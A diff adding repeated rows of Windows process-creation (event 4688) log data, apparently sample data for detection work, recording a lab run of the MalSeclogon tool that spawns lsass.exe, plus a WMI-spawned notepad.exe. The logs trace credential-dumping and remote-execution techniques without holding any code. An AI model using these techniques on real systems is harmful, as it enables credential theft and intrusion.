+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:06.656542Z"">
+    </TimeCreated>
+    <EventRecordID>21374</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""9832"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">WIND10$</Data>
+    <Data Name=""SubjectDomainName"">WINLAB</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""NewProcessId"">0x1dc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xe8c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:06.656542Z"">
+    </TimeCreated>
+    <EventRecordID>21374</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""9832"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">WIND10$</Data>
+    <Data Name=""SubjectDomainName"">WINLAB</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""NewProcessId"">0x1dc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xe8c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
